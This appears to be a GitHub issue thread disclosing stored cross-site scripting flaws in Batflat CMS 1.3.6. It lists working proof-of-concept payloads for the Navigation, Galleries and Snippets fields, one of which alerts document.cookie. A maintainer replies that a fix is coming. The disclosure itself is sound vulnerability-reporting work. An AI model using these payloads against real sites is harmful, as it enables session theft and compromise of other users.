Closed Tadjmen closed 2 years ago
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
Login with editor account with rights to Navigation, Galleries, Snippets
Add link payload: "><img src=x onerror=alert(document.cookie)>
Code being executed:
Add gallery payload: mlem"><svg/onload=alert(1)>
Add Snippets payload: mlem"><svg/onload=alert("TuongNC")>
Thanks for reporting the problem! Fixes will be available in the next update.
Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
Login with editor account with rights to Navigation, Galleries, Snippets
Navigation
Code being executed:
Galleries
Code being executed:
Snippets
Code being executed:![image](https://user-images.githubusercontent.com/25518949/108700016-9bf3da00-7538-11eb-825f-b825eac88f36.png)